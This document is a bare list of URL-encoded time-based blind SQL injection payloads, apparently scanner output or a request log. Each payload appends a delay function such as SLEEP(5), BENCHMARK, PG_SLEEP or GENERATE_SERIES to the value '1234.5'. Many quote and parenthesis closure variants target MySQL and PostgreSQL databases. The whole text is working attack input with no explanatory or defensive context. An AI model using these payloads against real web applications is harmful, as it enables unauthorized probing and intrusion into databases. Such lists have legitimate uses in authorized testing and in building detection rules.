1234.5%22%29%20AND%20SLEEP%285%29%20AND%20%28%22cWXp%22%20LIKE%20%22cWXp 1234.5%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22YRct%22%20LIKE%20%22YRct 1234.5%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22lnGS%22%20LIKE%20%22lnGS 1234.5%22%20AND%20SLEEP%285%29%20AND%20%22ycPK%22%20LIKE%20%22ycPK 1234.5%25%27%29%20AND%20SLEEP%285%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%20SLEEP%285%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%20SLEEP%285%29%20AND%20%28%27lUQO%27%3D%27lUQO 1234.5%00%27%20AND%20SLEEP%285%29%20AND%20%27giBy%27%3D%27giBy 1234.5%27%29%20WHERE%203749%3D3749%20AND%20SLEEP%285%29%20--%20 1234.5%22%29%20WHERE%209683%3D9683%20AND%20SLEEP%285%29%20--%20 1234.5%29%20WHERE%208911%3D8911%20AND%20SLEEP%285%29%20--%20 1234.5%27%20WHERE%205114%3D5114%20AND%20SLEEP%285%29%20--%20 1234.5%22%20WHERE%207353%3D7353%20AND%20SLEEP%285%29%20--%20 1234.5%20WHERE%204984%3D4984%20AND%20SLEEP%285%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27UQEG%27%20FROM%20DUAL%20WHERE%207359%3D7359%20AND%20SLEEP%285%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27ChoK%27%20WHERE%201631%3D1631%20AND%20SLEEP%285%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20SplD%20WHERE%203195%3D3195%20AND%20SLEEP%285%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27CbJi%27%20WHERE%201013%3D1013%20AND%20SLEEP%285%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%20%23 1234.5%29%20AND%20SLEEP%285%29%23 1234.5%27%29%20AND%20SLEEP%285%29%23 1234.5%27%20AND%20SLEEP%285%29%23 1234.5%22%20AND%20SLEEP%285%29%23 1234.5%29%20AND%20SLEEP%285%29%23 1234.5%29%29%20AND%20SLEEP%285%29%23 1234.5%29%29%29%20AND%20SLEEP%285%29%23 1234.5%20AND%20SLEEP%285%29%23 1234.5%27%29%20AND%20SLEEP%285%29%23 1234.5%27%29%29%20AND%20SLEEP%285%29%23 1234.5%27%29%29%29%20AND%20SLEEP%285%29%23 1234.5%27%20AND%20SLEEP%285%29%23 1234.5%27%29%20AND%20SLEEP%285%29%23 1234.5%27%29%29%20AND%20SLEEP%285%29%23 1234.5%27%29%29%29%20AND%20SLEEP%285%29%23 1234.5%27%20AND%20SLEEP%285%29%23 1234.5%22%29%20AND%20SLEEP%285%29%23 1234.5%22%29%29%20AND%20SLEEP%285%29%23 1234.5%22%29%29%29%20AND%20SLEEP%285%29%23 1234.5%22%20AND%20SLEEP%285%29%23 1234.5%22%29%20AND%20SLEEP%285%29%23 1234.5%22%29%29%20AND%20SLEEP%285%29%23 1234.5%22%29%29%29%20AND%20SLEEP%285%29%23 1234.5%22%20AND%20SLEEP%285%29%23 1234.5%25%27%29%20AND%20SLEEP%285%29%23 1234.5%25%27%29%29%20AND%20SLEEP%285%29%23 1234.5%25%27%29%29%29%20AND%20SLEEP%285%29%23 1234.5%25%27%20AND%20SLEEP%285%29%23 1234.5%00%27%29%20AND%20SLEEP%285%29%23 1234.5%00%27%20AND%20SLEEP%285%29%23 1234.5%27%29%20WHERE%204491%3D4491%20AND%20SLEEP%285%29%23 1234.5%22%29%20WHERE%205740%3D5740%20AND%20SLEEP%285%29%23 1234.5%29%20WHERE%201273%3D1273%20AND%20SLEEP%285%29%23 1234.5%27%20WHERE%205976%3D5976%20AND%20SLEEP%285%29%23 1234.5%22%20WHERE%207744%3D7744%20AND%20SLEEP%285%29%23 1234.5%20WHERE%208367%3D8367%20AND%20SLEEP%285%29%23 1234.5%27%7C%7C%28SELECT%20%27mpPk%27%20FROM%20DUAL%20WHERE%204251%3D4251%20AND%20SLEEP%285%29%23 1234.5%27%7C%7C%28SELECT%20%27rMoW%27%20WHERE%208798%3D8798%20AND%20SLEEP%285%29%23 1234.5%27%2B%28SELECT%20JhaN%20WHERE%201288%3D1288%20AND%20SLEEP%285%29%23 1234.5%27%2B%28SELECT%20%27jWuO%27%20WHERE%205714%3D5714%20AND%20SLEEP%285%29%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%23 1234.5%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29 1234.5%27%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29 1234.5%27%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29 1234.5%22%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29 1234.5%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%287766%3D7766 1234.5%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%283833%3D3833 1234.5%29%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%286876%3D6876 1234.5%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29 1234.5%27%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%27MeSO%27%3D%27MeSO 1234.5%27%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%27BmJg%27%3D%27BmJg 1234.5%27%29%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%28%27gsqE%27%3D%27gsqE 1234.5%27%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%27JTuj%27%3D%27JTuj 1234.5%27%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%27oiod%27%20LIKE%20%27oiod 1234.5%27%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%27DCqN%27%20LIKE%20%27DCqN 1234.5%27%29%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%28%27AZdO%27%20LIKE%20%27AZdO 1234.5%27%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%27ANsr%27%20LIKE%20%27ANsr 1234.5%22%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%22WzYX%22%3D%22WzYX 1234.5%22%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%22wtvg%22%3D%22wtvg 1234.5%22%29%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%28%22fzul%22%3D%22fzul 1234.5%22%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%22njSU%22%3D%22njSU 1234.5%22%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%22ziOd%22%20LIKE%20%22ziOd 1234.5%22%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%22ZYUG%22%20LIKE%20%22ZYUG 1234.5%22%29%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%28%22Obmh%22%20LIKE%20%22Obmh 1234.5%22%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%22TtJo%22%20LIKE%20%22TtJo 1234.5%25%27%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%28%27oxXg%27%3D%27oxXg 1234.5%00%27%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20AND%20%27QnDU%27%3D%27QnDU 1234.5%27%29%20WHERE%204725%3D4725%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20--%20 1234.5%22%29%20WHERE%202424%3D2424%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20--%20 1234.5%29%20WHERE%202891%3D2891%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20--%20 1234.5%27%20WHERE%201441%3D1441%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20--%20 1234.5%22%20WHERE%209249%3D9249%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20--%20 1234.5%20WHERE%208069%3D8069%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27QCtM%27%20FROM%20DUAL%20WHERE%202415%3D2415%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27jCCV%27%20WHERE%209853%3D9853%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20IaBT%20WHERE%203614%3D3614%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27VvFT%27%20WHERE%204294%3D4294%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209802%3DBENCHMARK%285000000%2CMD5%280x644a426f%29%29%20%23 1234.5%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%29%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%29%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%29%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%25%27%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%25%27%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%25%27%29%29%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%25%27%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%00%27%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%00%27%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%29%20WHERE%209139%3D9139%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%29%20WHERE%203335%3D3335%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%29%20WHERE%201983%3D1983%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%20WHERE%202498%3D2498%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%22%20WHERE%207063%3D7063%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%20WHERE%203434%3D3434%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%7C%7C%28SELECT%20%27UrWU%27%20FROM%20DUAL%20WHERE%203811%3D3811%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%7C%7C%28SELECT%20%27kxAu%27%20WHERE%203067%3D3067%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%2B%28SELECT%20AGJE%20WHERE%205456%3D5456%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%2B%28SELECT%20%27EeCQ%27%20WHERE%207161%3D7161%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%208461%3DBENCHMARK%285000000%2CMD5%280x4a6b7677%29%29%23 1234.5%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29 1234.5%27%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29 1234.5%27%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29 1234.5%22%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29 1234.5%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%285099%3D5099 1234.5%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%283704%3D3704 1234.5%29%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%282305%3D2305 1234.5%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29 1234.5%27%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27lbec%27%3D%27lbec 1234.5%27%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27FWPf%27%3D%27FWPf 1234.5%27%29%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27zIOJ%27%3D%27zIOJ 1234.5%27%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%27MuEj%27%3D%27MuEj 1234.5%27%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27zKhc%27%20LIKE%20%27zKhc 1234.5%27%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27WdLa%27%20LIKE%20%27WdLa 1234.5%27%29%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27wfmo%27%20LIKE%20%27wfmo 1234.5%27%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%27zhUD%27%20LIKE%20%27zhUD 1234.5%22%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22nitT%22%3D%22nitT 1234.5%22%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22xqom%22%3D%22xqom 1234.5%22%29%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22vxCC%22%3D%22vxCC 1234.5%22%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%22PFeV%22%3D%22PFeV 1234.5%22%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22UEeu%22%20LIKE%20%22UEeu 1234.5%22%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22LEfv%22%20LIKE%20%22LEfv 1234.5%22%29%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22JkUb%22%20LIKE%20%22JkUb 1234.5%22%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%22hGmo%22%20LIKE%20%22hGmo 1234.5%25%27%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27LQQU%27%3D%27LQQU 1234.5%00%27%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20AND%20%27FhNQ%27%3D%27FhNQ 1234.5%27%29%20WHERE%209005%3D9005%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20--%20 1234.5%22%29%20WHERE%206111%3D6111%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20--%20 1234.5%29%20WHERE%203814%3D3814%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20--%20 1234.5%27%20WHERE%204329%3D4329%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20--%20 1234.5%22%20WHERE%206241%3D6241%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20--%20 1234.5%20WHERE%207838%3D7838%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27CeXn%27%20FROM%20DUAL%20WHERE%204020%3D4020%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27CLIv%27%20WHERE%208566%3D8566%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20Jpuj%20WHERE%203913%3D3913%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27iiYT%27%20WHERE%202858%3D2858%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201170%3D%28SELECT%201170%20FROM%20PG_SLEEP%285%29%29%20%23 1234.5%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%29%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%29%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%29%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%25%27%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%25%27%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%25%27%29%29%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%25%27%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%00%27%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%00%27%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%20WHERE%209689%3D9689%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%29%20WHERE%203641%3D3641%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%29%20WHERE%206231%3D6231%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20WHERE%206475%3D6475%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%20WHERE%202816%3D2816%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%20WHERE%207667%3D7667%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%7C%7C%28SELECT%20%27EaSO%27%20FROM%20DUAL%20WHERE%204603%3D4603%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%7C%7C%28SELECT%20%27SlrF%27%20WHERE%208973%3D8973%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%2B%28SELECT%20aorR%20WHERE%204902%3D4902%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%2B%28SELECT%20%27fJDo%27%20WHERE%201939%3D1939%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201654%3D%28SELECT%201654%20FROM%20PG_SLEEP%285%29%29-- 1234.5%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%22%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%285369%3D5369 1234.5%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%282920%3D2920 1234.5%29%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%285943%3D5943 1234.5%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27ExrY%27%3D%27ExrY 1234.5%27%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27NctG%27%3D%27NctG 1234.5%27%29%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27IjEK%27%3D%27IjEK 1234.5%27%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27qSde%27%3D%27qSde 1234.5%27%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27lVhn%27%20LIKE%20%27lVhn 1234.5%27%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27WJof%27%20LIKE%20%27WJof 1234.5%27%29%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27abPM%27%20LIKE%20%27abPM 1234.5%27%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27zpuF%27%20LIKE%20%27zpuF 1234.5%22%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22TazZ%22%3D%22TazZ 1234.5%22%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22AqHy%22%3D%22AqHy 1234.5%22%29%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22wPzZ%22%3D%22wPzZ 1234.5%22%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22gsll%22%3D%22gsll 1234.5%22%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22itkD%22%20LIKE%20%22itkD 1234.5%22%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22fYtj%22%20LIKE%20%22fYtj 1234.5%22%29%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22Cuzu%22%20LIKE%20%22Cuzu 